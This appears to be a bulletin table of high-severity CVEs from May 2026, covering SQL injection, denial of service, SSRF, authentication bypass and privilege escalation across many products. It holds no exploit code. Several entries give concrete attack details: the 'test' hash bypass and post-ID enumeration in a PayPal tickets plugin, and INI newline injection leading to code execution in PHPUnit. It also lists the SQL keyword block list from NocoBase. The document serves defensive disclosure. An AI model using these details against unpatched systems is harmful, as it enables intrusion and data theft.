| Open-Emr--OpenEMR | OpenEMR 7.0.1 contains an authentication brute force vulnerability that allows attackers to bypass rate limiting protections by sending repeated login attempts to the main login endpoint. Attackers can submit POST requests with authUser and clearPass parameters to systematically test username and password combinations without account lockout restrictions. | 2026-05-05 | 7.5 | CVE-2023-54347 | ExploitDB-51413 Official Product Homepage Product Reference VulnCheck Advisory: OpenEMR 7.0.1 Authentication Brute Force Mitigation Bypass |
| Qualcomm, Inc.--Snapdragon | Memory corruption when processing camera sensor input/output control codes with invalid output buffers. | 2026-05-04 | 7.8 | CVE-2025-47405 | https://docs.qualcomm.com/product/publicresources/securitybulletin/may-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory corruption while creating a process on the digital signal processor due to allocation failure at the kernel level. | 2026-05-04 | 7.8 | CVE-2025-47407 | https://docs.qualcomm.com/product/publicresources/securitybulletin/may-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory corruption when another driver calls an IOCTL with invalid input/output buffer. | 2026-05-04 | 7.8 | CVE-2025-47408 | https://docs.qualcomm.com/product/publicresources/securitybulletin/may-2026-bulletin.html |
| WPMart--Team Member | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WPMart Team Member allows Blind SQL Injection. This issue affects Team Member: from n/a through 8.5. | 2026-05-07 | 7.6 | CVE-2025-68060 | https://patchstack.com/database/wordpress/plugin/team-showcase-supreme/vulnerability/wordpress-team-member-plugin-8-5-sql-injection-vulnerability?_s_id=cve |
| Unisoc (Shanghai) Technologies Co., Ltd.--SC7731E/SC9832E/SC9863A/T310/T610/T618/T7200/T7225/T7250/T7255/T7280/T7300/T8100/T9100/T8200/T8300 | In IMS, there is a possible system crash due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed. | 2026-05-06 | 7.5 | CVE-2025-71251 | https://www.unisoc.com/en/support/product-security-bulletin/2051836844671422466 |
| Unisoc (Shanghai) Technologies Co., Ltd.--SC7731E/SC9832E/SC9863A/T310/T610/T618/T7200/T7225/T7250/T7255/T7280/T7300/T8100/T9100/T8200/T8300 | In Modem IMS, there is a possible improper input validation. This could lead to remote denial of service with no additional execution privileges needed. | 2026-05-06 | 7.5 | CVE-2025-71252 | https://www.unisoc.com/en/support/product-security-bulletin/2051836844671422466 |
| Unisoc (Shanghai) Technologies Co., Ltd.--SC7731E/SC9832E/SC9863A/T310/T610/T618/T7200/T7225/T7250/T7255/T7280/T7300/T8100/T9100/T8200/T8300 | In Modem IMS, there is a possible improper input validation. This could lead to remote denial of service with no additional execution privileges needed. | 2026-05-06 | 7.5 | CVE-2025-71253 | https://www.unisoc.com/en/support/product-security-bulletin/2051836844671422466 |
| Unisoc (Shanghai) Technologies Co., Ltd.--SC7731E/SC9832E/SC9863A/T310/T610/T618/T7200/T7225/T7250/T7255/T7280/T7300/T8100/T9100/T8200/T8300 | In Modem IMS, there is a possible improper input validation. This could lead to remote denial of service with no additional execution privileges needed. | 2026-05-06 | 7.5 | CVE-2025-71254 | https://www.unisoc.com/en/support/product-security-bulletin/2051836844671422466 |
| Unisoc (Shanghai) Technologies Co., Ltd.--SC7731E/SC9832E/SC9863A/T310/T610/T618/T7200/T7225/T7250/T7255/T7280/T7300/T8100/T9100/T8200/T8300 | In Modem IMS, there is a possible improper input validation. This could lead to remote denial of service with no additional execution privileges needed. | 2026-05-06 | 7.5 | CVE-2025-71255 | https://www.unisoc.com/en/support/product-security-bulletin/2051836844671422466 |
| Unisoc (Shanghai) Technologies Co., Ltd.--T8100/T9100/T8200/T8300 | In nr modem, there is a possible improper input validation. This could lead to remote denial of service with no additional execution privileges needed. | 2026-05-06 | 7.5 | CVE-2025-71256 | https://www.unisoc.com/en/support/product-security-bulletin/2051836844671422466 |
| GravityMore--Gravity Bookings | The Gravity Bookings Premium plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 2.5.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2026-05-06 | 7.5 | CVE-2026-1719 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ce032abe-ee9d-4be1-ac97-5fa95d598e85?source=cve https://gravitybooking.com/ |
| Cisco--Cisco Unity Connection | A vulnerability in the web UI of Cisco Unity Connection Web Inbox could allow an unauthenticated, remote attacker to conduct SSRF attacks through an affected device. This vulnerability is due to improper input validation for specific HTTP requests. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to send arbitrary network requests that are sourced from the affected device. | 2026-05-06 | 7.2 | CVE-2026-20035 | cisco-sa-unity-rce-ssrf-hENhuASy |
| Cisco--Cisco IoT Field Network Director (IoT-FND) | A vulnerability in the web-based management interface of Cisco IoT Field Network Director could allow an authenticated, remote attacker with low privileges to cause a DoS condition on a remotely managed router. This vulnerability is due to improper error handling. An attacker could exploit this vulnerability by submitting crafted input to the web-based management interface. A successful exploit could allow the attacker to request unauthorized files from a remote router, causing the router to reload and resulting in a DoS condition. | 2026-05-06 | 7.7 | CVE-2026-20167 | cisco-sa-iot-fnd-dos-n8N26Q4u |
| Cisco--Cisco Small Business Smart and Managed Switches | A vulnerability in the Simple Network Management Protocol (SNMP) subsystem of Cisco 350 Series Managed Switches (SG350) and Cisco 350X Series Stackable Managed Switches (SG350X) firmware could allow an authenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. This vulnerability is due to improper error handling when parsing response data for a specific SNMP request. An attacker could exploit this vulnerability by sending a specific SNMP request to an affected device. A successful exploit could allow the attacker to cause the device to reload unexpectedly, resulting in a DoS condition. This vulnerability affects SNMP versions 1, 2c, and 3. To exploit this vulnerability through SNMPv2c or earlier, the attacker must know a valid read-write or read-only SNMP community string for the affected system. To exploit this vulnerability through SNMPv3, the attacker must have valid SNMP user credentials for the affected system. | 2026-05-06 | 7.7 | CVE-2026-20185 | cisco-sa-sg350-snmp-dos-GEFZr2Tj |
| Cisco--Cisco Crosswork Network Change Automation | A vulnerability in the connection-handling mechanism of Cisco Crosswork Network Controller (CNC) and Cisco Network Services Orchestrator (NSO) could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected system. This vulnerability is due to an inadequate implementation of rate-limiting on incoming network connections. An attacker could exploit this vulnerability by sending a large number of connection requests to an affected system. A successful exploit could allow the attacker to exhaust available connection resources, causing Cisco CNC and Cisco NSO to become unresponsive and resulting in a DoS condition for legitimate users and dependent services. A manual reboot of the system is required to recover from this condition. | 2026-05-06 | 7.5 | CVE-2026-20188 | cisco-sa-nso-dos-7Egqyc |
| Meta--react-server-dom-turbopack | A denial of service vulnerability could be triggered by sending specially crafted HTTP requests to server function endpoints, this could lead to server crashes, out-of-memory exceptions or excessive CPU usage; affecting the following packages: react-server-dom-webpack, react-server-dom-parcel, react-server-dom-turbopack (versions 19.0.0 through 19.0.5, 19.1.0 through 19.1.6, and 19.2.0 through 19.2.5). | 2026-05-06 | 7.5 | CVE-2026-23870 | https://github.com/facebook/react/security/advisories/GHSA-rv78-f8rc-xrxh |
| Qualcomm, Inc.--Snapdragon | Memory Corruption when copying data from a freed source while executing performance counter deselect operation. | 2026-05-04 | 7.8 | CVE-2026-24082 | https://docs.qualcomm.com/product/publicresources/securitybulletin/may-2026-bulletin.html |
| Jules Colle--Conditional Fields for Contact Form 7 | Conditional Fields for Contact Form 7 WordPress plugin through version 2.6.7 contains an uncontrolled resource consumption vulnerability in the Wpcf7cfMailParser class where the hide_hidden_mail_fields_regex_callback() method reads an iteration count directly from user-supplied POST parameters without validation or upper bound enforcement. Unauthenticated attackers can supply an arbitrarily large integer value through the REST API endpoint to cause unbounded loop execution with multiple preg_replace() operations, exhausting server memory and crashing the PHP process. | 2026-05-04 | 7.5 | CVE-2026-25863 | https://wordpress.org/plugins/cf7-conditional-fields/#developers https://www.vulncheck.com/advisories/conditional-fields-for-contact-form-7-dos-via-uncontrolled-resource-consumption |
| Microsoft--Microsoft 365 Copilot's Business Chat | Improper neutralization of special elements in M365 Copilot allows an unauthorized attacker to disclose information over a network. | 2026-05-07 | 7.5 | CVE-2026-26129 | M365 Copilot Information Disclosure Vulnerability |
| Microsoft--Microsoft 365 Copilot's Business Chat | Improper neutralization of special elements in output used by a downstream component ('injection') in M365 Copilot allows an unauthorized attacker to disclose information over a network. | 2026-05-07 | 7.5 | CVE-2026-26164 | M365 Copilot Information Disclosure Vulnerability |
| Profelis Information and Consulting Trade and Industry Limited Company--SambaBox | Improper Control of Generation of Code ('Code Injection') vulnerability in Profelis Information and Consulting Trade and Industry Limited Company SambaBox allows OS Command Injection. This issue affects SambaBox: from 5.1 before 5.3. | 2026-05-04 | 7.2 | CVE-2026-3120 | https://www.usom.gov.tr/bildirim/tr-26-0155 |
| Scott Paterson--easy-paypal-events-tickets | Easy PayPal Events & Tickets plugin for WordPress version 1.3 and earlier contain a hardcoded authentication bypass vulnerability in the QR code scanning functionality that allows unauthenticated remote attackers to bypass hash verification by supplying 'test' as the hash parameter. Attackers can access the vulnerable endpoint via the add_wpeevent_button_qr action to retrieve sensitive order details including PayPal transaction IDs, customer email addresses, purchase amounts, and ticket information for any order with a known or guessed post ID. This plugin was officially closed as of 2026-03-18. | 2026-05-04 | 7.5 | CVE-2026-32834 | https://gist.github.com/4lec4st/eb20f9934f8c23b4b241f74a8d884ce9 https://wordpress.org/plugins/easy-paypal-events-tickets https://www.vulncheck.com/advisories/easy-paypal-events-tickets-authentication-bypass-via-qr-code-scanning |
| Microsoft--Copilot Chat (Microsoft Edge) | Improper neutralization of special elements used in a command ('command injection') in Copilot Chat (Microsoft Edge) allows an unauthorized attacker to disclose information over a network. | 2026-05-07 | 7.5 | CVE-2026-33111 | Copilot Chat (Microsoft Edge) Information Disclosure Vulnerability |
| 10web--Form Maker by 10Web Mobile-Friendly Drag & Drop Contact Form Builder | The Form Maker by 10Web - Mobile-Friendly Drag & Drop Contact Form Builder plugin for WordPress is vulnerable to SQL Injection via the 'inputs' parameter in versions up to, and including, 1.15.42 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2026-05-05 | 7.5 | CVE-2026-3359 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f37cc880-d8a4-431a-9639-abf01163030a?source=cve https://plugins.trac.wordpress.org/changeset/3518461/form-maker |
| Red Hat--Red Hat Hardened Images | A heap buffer overflow vulnerability exists in the DTLS handshake fragment reassembly logic of GnuTLS. The issue arises in merge_handshake_packet() where incoming handshake fragments are matched and merged based solely on handshake type, without validating that the message_length field remains consistent across all fragments of the same logical message. An attacker can exploit this by sending crafted DTLS fragments with conflicting message_length values, causing the implementation to allocate a buffer based on a smaller initial fragment and subsequently write beyond its bounds using larger, inconsistent fragments. Because the merge operation does not enforce proper bounds checking against the allocated buffer size, this results in an out-of-bounds write on the heap. The vulnerability is remotely exploitable without authentication via the DTLS handshake path and can lead to application crashes or potential memory corruption. | 2026-05-04 | 7.5 | CVE-2026-33846 | RHSA-2026:13274 https://access.redhat.com/security/cve/CVE-2026-33846 RHBZ#2450625 |
| Akamai--Guardicore Platform Agent | Akamai Guardicore Platform Agent (GPA) and Zero Trust Client on Linux and macOS allow TOCTOU-based local privilege escalation. The GPA service creates an IPC socket in the world-writable /tmp directory. It accepts unauthenticated IPC control messages. This enables a TOCTOU vulnerability in the HandleSaveLogs() function of the GPA service, by creating a log file and manipulating it into a symlink that points to the targeted path; this can allow an unprivileged local user to make arbitrary root-owned files world-writable. In addition, a diagnostic collection tool (gimmelogs) running with root privileges was vulnerable to command injection from the dbstore, offering a second privilege escalation vector. (On Windows, gimmelogs does not have command injection but does allow writing a ZIP archive to an unintended location.) This affects Akamai Guardicore Platform Agent 7.0 through 7.3.1 and Akamai Zero Trust Client 6.0 through 6.1.5. | 2026-05-08 | 7.4 | CVE-2026-34354 | https://www.akamai.com/blog/security-research/advisory-cve-2026-34354-guardicore-local-privilege-escalation |
| ahmadgb--GeekyBot AI Copilot, Chatbot, WooCommerce Lead Gen & Zero-Prompt Content | The GeekyBot - Generate AI Content Without Prompt, Chatbot and Lead Generation plugin for WordPress is vulnerable to SQL Injection via the 'attributekey' parameter in versions up to, and including, 1.2.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2026-05-05 | 7.5 | CVE-2026-3456 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4c716fd3-6297-4b3a-a796-65f68f2986cf?source=cve https://plugins.trac.wordpress.org/changeset/3474168/geeky-bot |
| Hikvision--DS-3E1310P-SI | Some Hikvision switch products (discontinued since December 2023) are vulnerable to authenticated remote command execution due to insufficient input validation. Attackers with valid credentials can exploit this flaw by sending crafted packets containing malicious commands to affected devices, leading to arbitrary command execution. | 2026-05-09 | 7.2 | CVE-2026-3828 | https://www.hikvision.com/en/support/cybersecurity/security-advisory/command-execution-vulnerability-in-some-hikvision-switch-product/ |
| OpenStack--Cyborg | OpenStack Cyborg before 16.0.1 uses rule:allow (check_str='@') as the default policy for multiple API endpoints. This unconditionally authorizes any request carrying a valid Keystone token regardless of roles, project membership, or scope. An authenticated user with zero role assignments can complete various actions such as reprogramming FPGA bitstreams on arbitrary compute nodes via agent RPC. | 2026-05-07 | 7.4 | CVE-2026-40213 | https://bugs.launchpad.net/openstack-cyborg/+bug/2143263 https://www.openwall.com/lists/oss-security/2026/05/07/6 https://security.openstack.org/ossa/OSSA-2026-011.html |
| Spring--Spring Cloud Config | When using Google Secrets Manager as a backend for the Spring Cloud Config server a client can craft a request to the config server potentially exposing secrets from unintended GCP projects. Spring Cloud Config 3.1.x: affected from 3.1.0 through 3.1.13 (inclusive); upgrade to 3.1.14 or greater (Enterprise Support Only). Spring Cloud Config 4.1.x: affected from 4.1.0 through 4.1.9 (inclusive); upgrade to 4.1.10 or greater (Enterprise Support Only). Spring Cloud Config 4.2.x: affected from 4.2.0 through 4.2.6 (inclusive); upgrade to 4.2.7 or greater (Enterprise Support Only). Spring Cloud Config 4.3.x: affected from 4.3.0 through 4.3.2 (inclusive); upgrade to 4.3.3 or greater. Spring Cloud Config 5.0.x: affected from 5.0.0 through 5.0.2 (inclusive); upgrade to 5.0.3 or greater. | 2026-05-07 | 7.5 | CVE-2026-40981 | https://spring.io/security/cve-2026-40981 |
| Spring--Spring Cloud Config | The base directory (`spring.cloud.config.server.git.basedir`) used by the Spring Cloud Config Server to clone Git repositories to is susceptible to time-of-check-time-of-use (TOCTOU) attacks. Spring Cloud Config 3.1.x: affected from 3.1.0 through 3.1.13 (inclusive); upgrade to 3.1.14 or greater (Enterprise Support Only). Spring Cloud Config 4.1.x: affected from 4.1.0 through 4.1.9 (inclusive); upgrade to 4.1.10 or greater (Enterprise Support Only). Spring Cloud Config 4.2.x: affected from 4.2.0 through 4.2.6 (inclusive); upgrade to 4.2.7 or greater (Enterprise Support Only). Spring Cloud Config 4.3.x: affected from 4.3.0 through 4.3.2 (inclusive); upgrade to 4.3.3 or greater. Spring Cloud Config 5.0.x: affected from 5.0.0 through 5.0.2 (inclusive); upgrade to 5.0.3 or greater. | 2026-05-07 | 7.4 | CVE-2026-41002 | https://spring.io/security/cve-2026-41002 |
| harttle--liquidjs | LiquidJS is a Shopify / GitHub Pages compatible template engine in pure JavaScript. Prior to version 10.25.7, a circular block reference in {% layout %} / {% block %} causes an infinite recursive loop, consuming all available memory (~4GB) and crashing the Node.js process with FATAL ERROR: JavaScript heap out of memory. This allows any user who can submit a Liquid template to perform a Denial of Service attack. This issue has been patched in version 10.25.7. | 2026-05-09 | 7.5 | CVE-2026-41311 | https://github.com/harttle/liquidjs/security/advisories/GHSA-4rc3-7j7w-m548 https://github.com/harttle/liquidjs/commit/e2311dfd6e82f73509308aa8a3a1fafc92e226f0 https://github.com/harttle/liquidjs/releases/tag/v10.25.7 |
| QuantumNous--new-api | New API is a large language mode (LLM) gateway and artificial intelligence (AI) asset management system. Prior to version 0.12.10, a vulnerability exists in the Stripe webhook handler that allows an unauthenticated attacker to forge webhook events and credit arbitrary quota to their account without making any payment. This issue has been patched in version 0.12.10. | 2026-05-08 | 7.1 | CVE-2026-41432 | https://github.com/QuantumNous/new-api/security/advisories/GHSA-xff3-5c9p-2mr4 https://github.com/QuantumNous/new-api/releases/tag/v0.12.10 |
| Scott Paterson--easy-paypal-events-tickets | Easy PayPal Events & Tickets plugin for WordPress versions 1.3 and earlier contain an information disclosure vulnerability in the QR code scanning endpoint that allows unauthenticated attackers to enumerate and retrieve all customer order records. Attackers can iterate over sequential WordPress post IDs through the scan_qr.php endpoint to harvest the complete set of orders stored in the database without requiring authentication or prior knowledge of specific order identifiers. This plugin was officially closed as of 2026-03-18. | 2026-05-04 | 7.5 | CVE-2026-41471 | https://gist.github.com/4lec4st/9fd04b4bfadb3f7e388f61588f5f2564 https://wordpress.org/plugins/easy-paypal-events-tickets https://www.vulncheck.com/advisories/easy-paypal-events-tickets-information-disclosure-via-qr-code-endpoint |
| cilium--cilium | Cilium is a networking, observability, and security solution with an eBPF-based dataplane. Prior to versions 1.17.15, 1.18.9, and 1.19.3, the output of cilium-bugtool can contain sensitive data when the tool is run against Cilium deployments with WireGuard encryption enabled. This issue has been patched in versions 1.17.15, 1.18.9, and 1.19.3. | 2026-05-08 | 7.9 | CVE-2026-41520 | https://github.com/cilium/cilium/security/advisories/GHSA-gj49-89wh-h4gj https://github.com/cilium/cilium/releases/tag/v1.17.15 https://github.com/cilium/cilium/releases/tag/v1.18.9 https://github.com/cilium/cilium/releases/tag/v1.19.3 |
| Bricks--Bricks Builder | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Bricks Builder allows Reflected XSS. This issue affects Bricks Builder: from n/a through 1.9.2 to 2.2. | 2026-05-07 | 7.1 | CVE-2026-41554 | https://patchstack.com/database/wordpress/theme/bricks/vulnerability/wordpress-bricks-builder-theme-1-9-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| sebastianbergmann--phpunit | PHPUnit is a testing framework for PHP. In versions 12.5.21 and 13.1.5, PHPUnit forwards PHP INI settings to child processes (used for isolated/PHPT test execution) as -d name=value command-line arguments without neutralizing INI metacharacters. Because PHP's INI parser interprets " as a string delimiter, ; as the start of a comment, and most importantly a newline as a directive separator, a value containing a newline is parsed by the child process as multiple INI directives. An attacker able to influence a single INI value can therefore inject arbitrary additional directives into the child's configuration, including auto_prepend_file, extension, disable_functions, open_basedir, and others. Setting auto_prepend_file to an attacker-controlled path yields remote code execution in the child process. This issue has been patched in versions 12.5.22 and 13.1.6. | 2026-05-08 | 7.8 | CVE-2026-41570 | https://github.com/sebastianbergmann/phpunit/security/advisories/GHSA-qrr6-mg7r-m243 https://github.com/sebastianbergmann/phpunit/pull/6592 |
| Ajax30--BraveCMS-2.0 | Brave CMS is an open-source CMS. Prior to commit 6c56603, the contact form is publicly accessible (no authentication required). User-supplied message text is passed through PHP's nl2br() function, which converts newlines to <br> tags but does not escape HTML. The resulting string is then passed to a Blade email template using the unescaped {!! $msg !!} directive. The resulting content is then rendered in a Blade email template using the unescaped {!! $msg !!} directive. Because HTML is not sanitized, arbitrary markup can be injected into the email body. While modern HTML-capable email clients (Gmail or Outlook Web) typically block JavaScript execution, they still render HTML content. This allows attackers to craft convincing phishing interfaces inside the email sent to the administrator. This issue has been patched via commit 6c56603. | 2026-05-08 | 7.1 | CVE-2026-41576 | https://github.com/Ajax30/BraveCMS-2.0/security/advisories/GHSA-x7cg-8grr-grvx https://github.com/Ajax30/BraveCMS-2.0/commit/6c5660373cf5f0ca9181603280427aca46ef11ea |
| nocobase--nocobase | NocoBase is an AI-powered no-code/low-code platform for building business applications and enterprise solutions. Prior to version 2.0.39, the queryParentSQL() function in the core database package constructs a recursive CTE query by joining nodeIds with string concatenation instead of using parameterized queries. The nodeIds array contains primary key values read from database rows. An attacker who can create a record with a malicious string primary key can inject arbitrary SQL when any subsequent request triggers recursive eager loading on that collection. This issue has been patched in version 2.0.39. | 2026-05-07 | 7.5 | CVE-2026-41640 | https://github.com/nocobase/nocobase/security/advisories/GHSA-4948-f92q-f432 https://github.com/nocobase/nocobase/pull/9133 https://github.com/nocobase/nocobase/commit/202e2b8efe44ba90adbf1087f6f70881ff947604 https://github.com/nocobase/nocobase/releases/tag/v2.0.39 |
| nocobase--nocobase | NocoBase is an AI-powered no-code/low-code platform for building business applications and enterprise solutions. Prior to version 2.0.39, the checkSQL() validation function that blocks dangerous SQL keywords (e.g., pg_read_file, LOAD_FILE, dblink) is applied on the collections:create and sqlCollection:execute endpoints but is entirely missing on the sqlCollection:update endpoint. An attacker with collection management permissions can create a SQL collection with benign SQL, then update it with arbitrary SQL that bypasses all validation, and query the collection to execute the injected SQL and exfiltrate data. This issue has been patched in version 2.0.39. | 2026-05-07 | 7.2 | CVE-2026-41641 | https://github.com/nocobase/nocobase/security/advisories/GHSA-wrwh-c28m-9jjh https://github.com/nocobase/nocobase/pull/9134 https://github.com/nocobase/nocobase/commit/851aee543efa894142e0f7be03eb55d9cec06a91 https://github.com/nocobase/nocobase/releases/tag/v2.0.39 |
| osrg--gobgp | GoBGP is an open source Border Gateway Protocol (BGP) implementation in the Go Programming Language. In version 4.3.0, a remote Denial of Service (DoS) vulnerability exists in GoBGP due to a nil pointer dereference. When a malformed BGP UPDATE message contains an unrecognized Path Attribute marked as "Well-known," the daemon fails to interrupt the message handling flow. This results in an illegal memory access and a full process crash (panic). This issue has been patched in version 4.4.0. | 2026-05-07 | 7.5 | CVE-2026-41642 | https://github.com/osrg/gobgp/security/advisories/GHSA-7235-89m6-f4px https://github.com/osrg/gobgp/releases/tag/v4.4.0 |
| osrg--gobgp | GoBGP is an open source Border Gateway Protocol (BGP) implementation in the Go Programming Language. Prior to version 4.3.0, a remote Denial of Service (DoS) vulnerability exists in GoBGP where a malformed BGP UPDATE message can trigger a runtime error: index out of range panic. This occurs during the processing of 4-byte AS attributes when the message structure causes an internal slice index shift that is not properly handled. This issue has been patched in version 4.3.0. | 2026-05-07 | 7.5 | CVE-2026-41643 | https://github.com/osrg/gobgp/security/advisories/GHSA-8rxh-r2p6-7f2q https://github.com/osrg/gobgp/releases/tag/v4.3.0 |
| Admidio--admidio | Admidio is an open-source user management solution. Prior to version 5.0.9, a logic error in Admidio's two-factor authentication reset inverts the authorization check. Non-admin users cannot remove their own TOTP configuration, but they can remove other users' TOTP, including administrators. A group leader with profile edit rights on an admin account can strip that admin's 2FA. This issue has been patched in version 5.0.9. | 2026-05-07 | 7.1 | CVE-2026-41660 | https://github.com/Admidio/admidio/security/advisories/GHSA-rh3w-4ccx-prf9 https://github.com/Admidio/admidio/releases/tag/v5.0.9 |
| ellite--Wallos | Wallos is an open-source, self-hostable personal subscription tracker. In versions 4.8.4 and prior, the incomplete SSRF fix in Wallos validates webhook URLs via gethostbyname() but passes the original hostname to cURL without CURLOPT_RESOLVE pinning on 10 of 11 outbound HTTP endpoints, leaving a DNS rebinding TOCTOU window. At time of publication, there are no publicly available patches. | 2026-05-07 | 7.7 | CVE-2026-41688 | https://github.com/ellite/Wallos/security/advisories/GHSA-h4g7-xv3v-q73g https://github.com/ellite/Wallos/commit/e87387f0ebb540cd33e6dfda7181db9db650ecef |
| locize--locize | locize is a localization platform that connects code and i18n setup. Prior to version 4.0.21, the locize client SDK registers a window.addEventListener("message", …) handler that dispatches to registered internal handlers (editKey, commitKey, commitKeys, isLocizeEnabled, requestInitialize, …) without validating event.origin. The pre-patch listener in src/api/postMessage.js gates dispatch on event.data.sender === "i18next-editor-frame" - that value sits inside the attacker-controlled message payload, not the browser-enforced origin. Any web page that could embed or be embedded by a locize-enabled host - an iframe on a third-party page, a window.open-ed victim, a parent frame reaching down - could send a crafted postMessage and trigger the internal handlers. This issue has been patched in version 4.0.21. | 2026-05-08 | 7.5 | CVE-2026-41886 | https://github.com/locize/locize/security/advisories/GHSA-w937-fg2h-xhq2 https://github.com/locize/locize/releases/tag/v4.0.21 |
| freescout-help-desk--freescout | FreeScout is a free help desk and shared inbox built with PHP's Laravel framework. Prior to version 1.8.217, a user with updateAutoReply permission can store an XSS payload in the mailbox auto-reply message. The payload is rendered unescaped in the auto-reply email sent to every customer who contacts the mailbox. Email clients do not enforce CSP, so the payload executes in the customer's webmail / mail-client context. This issue has been patched in version 1.8.217. | 2026-05-07 | 7.6 | CVE-2026-41904 | https://github.com/freescout-help-desk/freescout/security/advisories/GHSA-q3fh-rj9h-jfrc https://github.com/freescout-help-desk/freescout/releases/tag/1.8.217 |
| freescout-help-desk--freescout | FreeScout is a free help desk and shared inbox built with PHP's Laravel framework. Prior to version 1.8.217, Helper::sanitizeRemoteUrl() in app/Misc/Helper.php follows HTTP redirects via curlGetLastRedirectedUrl() but then re-validates the original URL instead of the final redirect destination. An attacker who can supply any URL that passes the initial host check can redirect FreeScout to internal HTTP services (cloud metadata, internal APIs, RFC1918 ranges) that would normally be blocked. This issue has been patched in version 1.8.217. | 2026-05-07 | 7.7 | CVE-2026-41905 | https://github.com/freescout-help-desk/freescout/security/advisories/GHSA-22wf-848c-c856 https://github.com/freescout-help-desk/freescout/releases/tag/1.8.217 |
| freescout-help-desk--freescout | FreeScout is a free help desk and shared inbox built with PHP's Laravel framework. Prior to version 1.8.214, the Change Customer modal correctly hides out-of-scope customers through the mailbox-filtered search endpoint, but the backend conversation_change_customer action accepts any supplied customer_email. A low-privileged agent can forge a request and bind a visible conversation to a hidden customer in another mailbox. This issue has been patched in version 1.8.214. | 2026-05-07 | 7.1 | CVE-2026-41906 | https://github.com/freescout-help-desk/freescout/security/advisories/GHSA-p6hg-2cwg-rrx9 https://github.com/freescout-help-desk/freescout/releases/tag/1.8.214 |
| Red Hat--Red Hat Enterprise Linux 10 | A flaw was found in gnutls. Servers configured with RSA-PSK (Rivest-Shamir-Adleman - Pre-Shared Key) wrongfully matched usernames containing a NUL character with truncated usernames. A remote attacker could exploit this by sending a specially crafted username, leading to an authentication bypass. This vulnerability allows an attacker to gain unauthorized access by circumventing the authentication process. | 2026-05-07 | 7.1 | CVE-2026-42010 | https://access.redhat.com/security/cve/CVE-2026-42010 RHBZ#2467289 |
| Red Hat--Red Hat Enterprise Linux 10 | A flaw was found in gnutls. This vulnerability occurs because permitted name constraints were incorrectly ignored when previous Certificate Authorities (CAs) only had excluded name constraints. A remote attacker could exploit this to bypass critical name constraint checks during certificate validation. This bypass could lead to the acceptance of invalid certificates, potentially enabling spoofing or man-in-the-middle attacks against affected systems. | 2026-05-07 | 7.4 | CVE-2026-42011 | https://access.redhat.com/security/cve/CVE-2026-42011 RHBZ#2467437 |
| prometheus--prometheus | Prometheus is an open-source monitoring system and time series database. Prior to versions 3.5.3 and 3.11.3, the client_secret field in the Azure AD remote write OAuth configuration (storage/remote/azuread) was typed as string instead of Secret. Prometheus redacts fields of type Secret when serving the configuration via the /-/config HTTP API endpoint. Because the field was a plain string, the Azure OAuth client secret was exposed in plaintext to any user or process with access to that endpoint. This issue has been patched in versions 3.5.3 and 3.11.3. | 2026-05-04 | 7.5 | CVE-2026-42151 | https://github.com/prometheus/prometheus/security/advisories/GHSA-wg65-39gg-5wfj https://github.com/prometheus/prometheus/pull/18587 https://github.com/prometheus/prometheus/pull/18590 https://github.com/prometheus/prometheus/releases/tag/v3.11.3 https://github.com/prometheus/prometheus/releases/tag/v3.5.3 |
| prometheus--prometheus | Prometheus is an open-source monitoring system and time series database. Prior to versions 3.5.3 and 3.11.3, the remote read endpoint (/api/v1/read) does not validate the declared decoded length in a snappy-compressed request body before allocating memory. An unauthenticated attacker can send a small payload that causes a huge heap allocation per request. Under concurrent load this can exhaust available memory and crash the Prometheus process. This issue has been patched in versions 3.5.3 and 3.11.3. | 2026-05-04 | 7.5 | CVE-2026-42154 | https://github.com/prometheus/prometheus/security/advisories/GHSA-8rm2-7qqf-34qm https://github.com/prometheus/prometheus/pull/18584 https://github.com/prometheus/prometheus/pull/18585 https://github.com/prometheus/prometheus/releases/tag/v3.11.3 https://github.com/prometheus/prometheus/releases/tag/v3.5.3 |
| Eugeny--russh | Russh is a Rust SSH client & server library. Prior to version 0.60.1, a pre-authentication denial-of-service vulnerability exists in the server's keyboard-interactive authentication handler. A malicious client can crash any russh-based server that implements keyboard-interactive auth (e.g., for 2FA/TOTP) with a single malformed packet, requiring no credentials. This issue has been patched in version 0.60.1. | 2026-05-08 | 7.5 | CVE-2026-42189 | https://github.com/Eugeny/russh/security/advisories/GHSA-f5v4-2wr6-hqmg https://github.com/Eugeny/russh/commit/6c3c80a9b6d60763d6227d60fa8310e57172a4d1 https://github.com/Eugeny/russh/releases/tag/v0.60.1 |
| dail8859--NotepadNext | Notepad Next is a cross-platform, reimplementation of Notepad++. Prior to version 0.14, NotepadNext's detectLanguageFromExtension() function interpolates a file's extension directly into a Lua script without sanitization. An attacker can craft a filename whose extension contains Lua code, which executes automatically when the victim opens the file in NotepadNext. Because luaL_openlibs() is called unconditionally, the full os, io, and package libraries are available to the injected code, enabling arbitrary command execution. This issue has been patched in version 0.14. | 2026-05-07 | 7.8 | CVE-2026-42214 | https://github.com/dail8859/NotepadNext/security/advisories/GHSA-m5fq-c9x5-w54g https://github.com/dail8859/NotepadNext/commit/f3ca1b10aca52f05fd7f4f5ebf9b566d6cd95ccc https://github.com/dail8859/NotepadNext/releases/tag/v0.14 |
